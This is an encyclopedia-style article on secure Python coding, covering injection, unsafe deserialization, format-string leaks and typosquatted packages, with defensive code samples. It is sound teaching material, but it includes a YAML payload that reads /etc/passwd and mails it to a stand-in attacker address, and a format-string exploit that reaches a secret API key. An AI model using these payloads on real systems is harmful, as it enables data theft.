Secure Coding with Python
Writing secure code is essential for protecting sensitive data and maintaining correct behaviour of applications. This is more relevant today when most applications connect to the web, exchange data and even update themselves. While security considerations and best practices are typically language agnostic, in this article we focus on Python-specific issues.
OWASP's Python Security project has identified three angles: Security in Python (white-box analysis, functional analysis), Security of Python (black-box analysis), and Security with Python (develop security-hardened Python).
While some vulnerabilities are due to the way Python modules and functions behave, others are due to the manner in which third-party packages are distributed. Since Python is an open developer ecosystem, anyone can share their own packages that others can use in their projects. However, this opens up a security risk that developers need to be aware of.
Discussion
What are some guidelines for writing more secure Python code?
It's essential to validate user input. Otherwise, an attacker could execute arbitrary code. Python functions eval(), exec(), input() (in Python 2), os.popen() and os.system(), as well as the functions of the subprocess module when they invoke a shell, are dangerous in this regard. These could be used to bypass authentication or inject code. For example, Python 2's input() evaluates whatever is typed as a Python expression. Typing passwd in response to the statement if passwd == input("Please enter your password"): makes the comparison true and bypasses authentication.
Databases are also vulnerable to inputs. Using inputs directly in database commands is dangerous and enables what's commonly called SQL injection. Instead, validate the inputs and query databases via parameterized queries or an ORM. Among the well-known Python ORMs are Django ORM, SQLAlchemy and Peewee.
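As a rough sketch of these two habits, the snippet below parses a literal with ast.literal_eval() instead of eval(), and passes user input to SQLite as a bound parameter rather than splicing it into the SQL text. The function names and the users table are hypothetical. The sqlite3 module is used only because it ships with Python; an ORM achieves the same separation of code and data.

```python
import ast
import sqlite3


def parse_number_list(text):
    """Parse text such as "[1, 2, 3]" without executing arbitrary code."""
    # literal_eval() accepts only Python literals; a function call or
    # attribute access raises ValueError instead of being executed.
    value = ast.literal_eval(text)
    if not isinstance(value, list) or not all(isinstance(v, int) for v in value):
        raise ValueError("expected a list of integers")
    return value


def find_user(conn, name):
    """Look up a user by name using a bound parameter (hypothetical schema)."""
    # The "?" placeholder keeps the input as data; it is never parsed as SQL.
    cur = conn.execute("SELECT id, name FROM users WHERE name = ?", (name,))
    return cur.fetchall()


# Usage with an in-memory database
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
conn.execute("INSERT INTO users (name) VALUES (?)", ("alice",))

numbers = parse_number_list("[1, 2, 3]")
rows = find_user(conn, "alice")
# A classic injection string is treated as an ordinary, non-matching name.
injected = find_user(conn, "' OR '1'='1")
```

Validation still matters after parsing, which is why parse_number_list() checks the type of the result before returning it.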
Python's assert statement must be used only to check invariants while debugging. Using it for authentication (such as assert user.is_admin, "user does not have access") is wrong. Production servers often run Python with optimizations enabled (the -O flag), in which case __debug__ is False and assert statements are skipped.
To create temporary files, avoid the deprecated tempfile.mktemp() function; tempfile.mkstemp() and tempfile.NamedTemporaryFile() are safer alternatives. In general, keep your Python distribution and the packages you use up to date. For example, earlier CPython implementations of Python had memory overflow errors that could be exploited for arbitrary code execution.
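The following minimal sketch illustrates both points: an explicit access check that still runs when assertions are disabled, and a temporary file created with tempfile.mkstemp() rather than tempfile.mktemp(). The User class and the function names are hypothetical and exist only for illustration.

```python
import os
import tempfile


class User:
    """Hypothetical user object, for illustration only."""

    def __init__(self, is_admin):
        self.is_admin = is_admin


def require_admin(user):
    # An explicit check still runs under "python -O", unlike an assert.
    if not user.is_admin:
        raise PermissionError("user does not have access")


def write_temp(data):
    """Write bytes to a new temporary file and return its path."""
    # mkstemp() creates and opens the file in one step, so there is no
    # gap between choosing a name and creating the file.
    fd, path = tempfile.mkstemp()
    with os.fdopen(fd, "wb") as handle:
        handle.write(data)
    return path


path = write_temp(b"scratch data")
with open(path, "rb") as handle:
    content = handle.read()
os.remove(path)  # the caller is responsible for cleanup
```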
How should I manage Python dependencies for a more secure application?
PyPI is the repository from which third-party Python packages required by your project can be downloaded and installed. Direct dependencies may have further dependencies. Any of these could contain malicious code.
It's easy to create a malicious package based on a well-known package since the original code is open source and easily copied. Often these packages behave normally since the malicious code resides only in setup.py, which executes once during installation. This is enough to install software that can later steal data or monitor behaviour. Some attacks modify the original code, for example, to steal SSH credentials.
Developers can be tricked into installing the wrong package by a slight modification of the original package name. This is called typosquatting. There are plenty of examples: acqusition impersonates acquisition; bzip impersonates bz2file; crypt impersonates crypto; setup-tools impersonates setuptools; urlib3 impersonates urllib3; diango impersonates django.
PEP 458 proposes signed repository metadata for PyPI downloads. However, a signature only establishes where a package came from, not whether its code is benign. To catch malicious packages, a combination of dynamic analysis (within a sandbox) and static analysis can be used.
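Before installation, a much simpler name-similarity check can also flag likely typosquats. The sketch below is only a heuristic and not the sandbox or static analysis mentioned above. The function name, the list of known packages and the 0.8 cutoff are assumptions chosen for illustration.

```python
import difflib

# Hypothetical allow-list of package names the project intends to use.
KNOWN_PACKAGES = ["urllib3", "django", "setuptools", "jellyfish", "requests"]


def find_lookalikes(name, known=KNOWN_PACKAGES, cutoff=0.8):
    """Return known package names that `name` closely resembles."""
    candidate = name.lower()
    if candidate in known:
        return []  # exact match: this is the intended package
    # get_close_matches() ranks candidates by difflib's similarity ratio.
    return difflib.get_close_matches(candidate, known, n=3, cutoff=cutoff)


suspects = {name: find_lookalikes(name) for name in ["urlib3", "diango", "requests"]}
```

A non-empty result means the requested name is close to, but not the same as, a package on the allow-list and deserves a second look before it is installed.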
What security risks do Python strings pose if used improperly?
Python 3 introduced str.format() as a more powerful and flexible way to format strings. This method is called on a format string and accepts Python objects as arguments. The problem is that attributes of these arguments can be accessed from within the format string. If the application gives users control of the format string, it can be misused to leak sensitive data.
There are a few cases where such control may be common. Applications that are translated into multiple languages may give untrusted translators control of the format string. Some applications may permit users to configure behaviour through settings that are exposed as format strings.
An example exploit is the code "{person.__init__.__globals__[CONFIG][API_KEY]}".format(person=person), where sensitive global data from a CONFIG dictionary is accessed via the argument.
We can overcome this by validating the format string. One approach is shown by Armin Ronacher, who subclasses Formatter and Mapping, makes use of formatter_field_name_split and raises an AttributeError if unsafe formats are detected.
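The idea of validating field names can be sketched with the standard library's string.Formatter. This is a simplified stand-in and not Ronacher's implementation: it overrides get_field() and rejects any field whose attribute or index names start with an underscore. The Person and SafeFormatter classes are hypothetical names used for illustration.

```python
import re
from string import Formatter


class Person:
    def __init__(self, name):
        self.name = name


class SafeFormatter(Formatter):
    """Formatter that refuses fields touching underscore-prefixed names."""

    def get_field(self, field_name, args, kwargs):
        # "person.__init__[CONFIG]" splits into
        # ["person", "__init__", "CONFIG", ""].
        parts = re.split(r"[.\[\]]", field_name)
        if any(part.startswith("_") for part in parts):
            raise AttributeError(f"unsafe field in format string: {field_name!r}")
        return super().get_field(field_name, args, kwargs)


formatter = SafeFormatter()
person = Person("Alice")

# An ordinary attribute lookup is still allowed.
greeting = formatter.format("Hello, {person.name}!", person=person)

# A format string that reaches into dunder attributes is rejected.
try:
    formatter.format("{person.__init__.__globals__[CONFIG]}", person=person)
    blocked = False
except AttributeError:
    blocked = True
```

Blocking every underscore-prefixed name is deliberately strict. An application that needs finer control would have to decide which attributes are safe to expose.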
What's a secure way to do data deserialization in Python?
Deserialization recreates Python objects by reading their representation from disk or a network interface. It's possible to deserialize malicious data and thereby execute arbitrary code in your system. This is because objects are not just values. They contain constructors and methods that are executable code.
For example, a web application could store user information in a cookie that's formed using the cPickle or pickle module. An attacker could craft a payload in which an object's __reduce__ method names a callable of the attacker's choosing, and that callable would be invoked during deserialization. A better approach would be to use json.loads(). If cPickle is used, verify the payload integrity using cryptographic signatures. PyCrypto has been suggested for this, though it's no longer maintained; the standard library's hmac module can also sign payloads.
Another serialization format is YAML. YAML files can represent Python objects. Like pickle data, they can be modified to bypass authentication or execute arbitrary code. For example, configuration files in Ansible are YAML files. The following payload reads /etc/passwd and emails its contents to the attacker's address: !!python/object/apply:os.system ["cat /etc/passwd | mail hacker@domain.com"]. Essentially, it's unwise to deserialize data from an untrusted source. A safer alternative is to use yaml.safe_load() rather than yaml.load().
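As one possible illustration of combining json.loads() with an integrity check, the sketch below signs a JSON payload with an HMAC and verifies the signature before parsing. The key, the token layout (hex digest, a colon, then the JSON text) and the function names are assumptions made for this example.

```python
import hashlib
import hmac
import json

# Hypothetical key; a real application would load this from secure storage.
SECRET_KEY = b"replace-with-a-real-secret"


def sign(data):
    """Serialize a dict to JSON and prefix it with an HMAC-SHA256 tag."""
    payload = json.dumps(data, sort_keys=True)
    tag = hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest()
    return f"{tag}:{payload}"


def verify(token):
    """Check the tag, then parse the JSON payload; raise ValueError on tampering."""
    tag, _, payload = token.partition(":")
    expected = hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest()
    # compare_digest() compares in constant time to resist timing attacks.
    if not hmac.compare_digest(tag, expected):
        raise ValueError("signature mismatch")
    return json.loads(payload)


token = sign({"user": "alice"})
restored = verify(token)
```

Because JSON carries only plain values, even a correctly signed payload cannot cause code to run when it is parsed.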
What are some resources for Python developers to create more secure code?
Python core modules that can help developers build security features include hashlib, hmac and secrets. For passwords and security tokens, secrets must be preferred over random. Functions hmac.compare_digest() and secrets.compare_digest() are designed to mitigate timing attacks.
Bandit is a useful static linter that can alert developers to common security issues in code. Another static analyzer, open sourced by Facebook, is Pysa. To audit installed packages and their versions, use a tool such as Chef InSpec. PyUp tracks thousands of Python packages for vulnerabilities and makes pull requests to your codebase automatically when there are updates.
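A brief sketch of the standard-library helpers for secrets follows. The function names, password alphabet and default lengths are arbitrary choices for illustration.

```python
import secrets
import string


def make_password(length=16):
    """Build a random password from letters and digits using secrets."""
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))


def make_token(nbytes=32):
    """Return a URL-safe text token derived from nbytes random bytes."""
    return secrets.token_urlsafe(nbytes)


def tokens_match(supplied, expected):
    # Encoding to bytes lets compare_digest() handle non-ASCII text too.
    return secrets.compare_digest(supplied.encode(), expected.encode())


password = make_password(20)
token = make_token()
```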
Python Security is an OWASP project aimed at creating a security-hardened version of Python. Their page on security concerns in modules and functions is worth reading. They've also curated a list of Python libraries for security applications.
Some Python Enhancement Proposals (PEPs) specific to security are worth reading for in-depth understanding. Among them are PEP 458, PEP 506, PEP 551 and PEP 578.
Milestones
2008
Python 3.0 is released. This release includes PEP 3101 -- Advanced String Formatting. Strings can now be formatted using the str.format() method. For more secure code, it's noted that applications shouldn't format strings from untrusted sources. The next best approach is to ensure that string formatting doesn't result in visible side effects, though this is not easy to achieve given the open nature of Python.
2011
Marco Slaviero publishes a detailed report on the many possible exploits and attack scenarios on the pickle module. He gives guidelines on how to write shellcode to create such exploits. He provides a library of exploits that can retrieve a list of globals and locals, make operating system calls, execute arbitrary Python code, alter local variables or mount a DoS attack.
2016
Python 3.6.0 is released. This release includes the secrets module that's documented in PEP 506. Python's existing random module is not suited for security purposes. Though the documentation makes this clear, many implementations ignore this warning. To solve this problem, the secrets module includes ready-to-use functions for managing passwords, tokens and other secrets.
2019
Discussions start towards implementing PEP 458 -- Secure PyPI downloads with signed repository metadata. Although this PEP was started in 2013, funding becomes available only now. Under this proposal, authors need not sign the packages they upload to PyPI. PyPI will automatically sign these packages using keys that it manages. This is called the minimum security model. This PEP doesn't address the maximum security model, in which authors sign their own packages.
2019
German software developer Lukas Martini finds two typosquatting packages on PyPI. These are python3-dateutil (impersonating dateutil) and jeIlyfish (impersonating jellyfish). The former doesn't have any malicious code but it imports the latter. Package jeIlyfish downloads a file, decodes that into Python code and executes it. This code attempts to read SSH and GPG keys from the computer and send them to a specific IP address.
2020
Facebook open sources Pysa, a static analysis tool to detect and prevent security issues in Python code. It's shipped as part of Pyre, a static type checker. Pysa tracks data flows. Developers define sources where data originates and sinks where that data shouldn't end up. Pysa warns when data from a source reaches a sink. It has techniques to mitigate false positives and false negatives.
References
- Bertus. 2018. "Detecting Cyber Attacks in the Python Package Index (PyPI)." Medium, October 13. Accessed 2020-03-20.
- Bleaney, Graham and Sinan Cepel. 2020. "Pysa: An open source static analysis tool to detect and prevent security issues in Python code." Blog, Facebook Engineering, August 7. Accessed 2020-08-11.
- Branca, Enrico. 2014. "Secure Coding with Python." OWASP Romania Conference 2014, October 24. Accessed 2020-03-20.
- Chef InSpec Docs. 2020. "pip." Chef InSpec Docs, v4.18.100. Accessed 2020-03-21.
- Cimpanu, Catalin. 2017. "Ten Malicious Libraries Found on PyPI - Python Package Index." BleepingComputer, September 15. Accessed 2020-03-20.
- Cimpanu, Catalin. 2018. "Twelve malicious Python libraries found and removed from PyPI." ZDNet, October 27. Accessed 2020-03-20.
- Cimpanu, Catalin. 2019. "Two malicious Python libraries caught stealing SSH and GPG keys." ZDNet, December 4. Accessed 2020-03-20.
- D'Aprano, Steven. 2015. "PEP 506 -- Adding A Secrets Module To The Standard Library." Python.org, September 19. Accessed 2020-03-20.
- Franklin Jr, Curtis. 2019. "Malware in PyPI Code Shows Supply Chain Risks." Dark Reading, July 19. Accessed 2020-03-20.
- Kuppusamy, Trishank Karthik, Vladimir Diaz, Marina Moore, Lukas Puehringer, Joshua Lock, Lois Anne DeLong, and Justin Cappos. 2013. "PEP 458 -- Secure PyPI downloads with signed repository metadata." Python.org, September 27. Updated 2019-11-13. Accessed 2020-03-20.
- Leblanc, Maxime. 2018. "Rotten pickles: A quick introduction to offensive serialization techniques." poka-techblog, on Medium, March 13. Accessed 2020-03-20.
- Li, Vickie. 2019. "Hacking Python Applications." The Startup, on Medium, November 15. Accessed 2020-03-20.
- Makai, Matt. 2020. "Object-relational Mappers (ORMs)." Full Stack Python. Accessed 2020-03-21.
- Mavituna, Ferruh. 2015. "SQL Injection Cheat Sheet." Blog, Netsparker, October 21. Updated 2019-08-26. Accessed 2020-03-20.
- National Security Authority. 2017. "skcsirt-sa-20170909-pypi." SK-CSIRT advisory, National Security Authority, Slovak Republic, September 09. Updated 2017-09-21. Accessed 2020-03-20.
- OWASP Python Security. 2020a. "OWASP Python Security Project." Accessed 2020-03-20.
- OWASP Python Security. 2020b. "Libraries." Accessed 2020-03-20.
- PyYAML Wiki. 2020. "PyYAML Documentation." Accessed 2020-03-21.
- Python. 2008. "What's New In Python 3.0." Python.org. Accessed 2020-03-21.
- Python. 2016. "Python 3.6.0." Python.org. Accessed 2020-03-21.
- Python. 2020. "Search Python.org: 'security PEP'." Accessed 2020-03-21.
- Python Docs. 2020a. "The Python Standard Library." v3.8.2, March 21. Accessed 2020-03-21.
- Python Docs. 2020b. "secrets — Generate secure random numbers for managing secrets." The Python Standard Library, v3.8.2, March 21. Accessed 2020-03-21.
- Python Docs. 2020c. "Input and Output." The Python Tutorial, v3.8.2, March 20. Accessed 2020-03-20.
- Ronacher, Armin. 2016. "Be Careful with Python's New-Style String Format." Blog, December 29. Accessed 2020-03-20.
- Shaw, Anthony. 2018. "10 common security gotchas in Python and how to avoid them." Hackernoon, June 15. Accessed 2020-03-20.
- Slaviero, Marco. 2011. "Sour Pickles: Shellcoding in Python's serialisation format." Sensepost, July 12. Accessed 2020-03-20.
- Talin. 2006. "PEP 3101 -- Advanced String Formatting." Python.org, April 16. Updated 2008-09-14. Accessed 2020-03-21.
- Viter, Alexander. 2018. "How to write secure code in Python." Blog, CheckiO, August 22. Accessed 2020-03-20.
Further Reading
- Li, Vickie. 2019. "Hacking Python Applications." The Startup, on Medium, November 15. Accessed 2020-03-20.
- Shaw, Anthony. 2018. "10 common security gotchas in Python and how to avoid them." Hackernoon, June 15. Accessed 2020-03-20.
- Slaviero, Marco. 2011. "Sour Pickles: Shellcoding in Python's serialisation format." Sensepost, July 12. Accessed 2020-03-20.
- Branca, Enrico. 2014. "Secure Coding with Python." OWASP Romania Conference 2014, October 24. Accessed 2020-03-20.
- Denbraver, Hayley and Kenneth Reitz. 2019. "Python Security Best Practices Cheat Sheet." Blog, Snyk, February 28. Accessed 2020-03-20.
See Also
- Information Security Principles
- Web Exploitation
- API Security
- Cloud Security
- Network Security
- IoT Security